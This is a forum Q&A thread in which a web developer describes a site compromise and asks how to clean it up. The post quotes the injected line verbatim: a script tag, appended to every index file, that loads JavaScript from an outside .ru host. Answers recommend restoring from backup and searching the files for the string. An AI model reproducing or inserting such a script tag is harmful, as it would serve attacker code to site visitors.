0

The computer that I do my most webdevelopment work with caught a virus. A website that I am currently working on was compromised(I think by phpDesigners stored FTP password).

I currently get :

<script type="text/javascript" src="http://obscurewax.ru/Queue.js"></script>
<!--[some-random-number-here]-->

right at the end of every file that has the name starting with index on that domain.

currently I am combing through each and every file on the server with the name index(and others randomly) for this change and removing it, but this is a lengthy process and I am not sure if this is the right/entire fix for it.

What is the best way to deal with this type of a scenario?
(The virus on the PC has be cleaned)

DMin
  • 398
  • 2
  • 11
  • removing the actual link to a Javascript virus may also be a fairly good move. example.com is a perfect URL for this use. – Alister Bulman Aug 03 '10 at 22:43
  • For people searching for a solution, SO question : http://stackoverflow.com/questions/3393888/how-can-i-remove-script-virus-from-my-script @Alister : thanks, didn't know example.com was a reserved domain, great. – DMin Aug 03 '10 at 22:57

4 Answers4

3

As with any compromised system, the best course of action is to wipe it and restore from a known good backup.

Chris S
  • 77,945
  • 11
  • 124
  • 216
1

As ChrisS says, wipe and restore if at all possible. If you are wrong about how they got in (and the hackers do not try to break into indivual sites, they generally do it en-mass), they will use the same method again and again. Rackspace hosting has some advice on Dealing with a site compromise as well.

Alister Bulman
  • 1,624
  • 13
  • 13
1

This is related to this question:

https://stackoverflow.com/questions/3393888/how-can-i-remove-script-virus-from-my-script/

Community
  • 1
  • Thanks, I answered it myself. Its quite detailed if you want to have a look at it. Do add to it if you have more information. cheers! – DMin Sep 04 '10 at 06:48
0

Most text editors (I use NotePad++) will find a string in a set of files. I'd try pointing the editor at the root of your source directory and find obsurewax.ru to see how many files are there.

BillN
  • 1,503
  • 1
  • 13
  • 31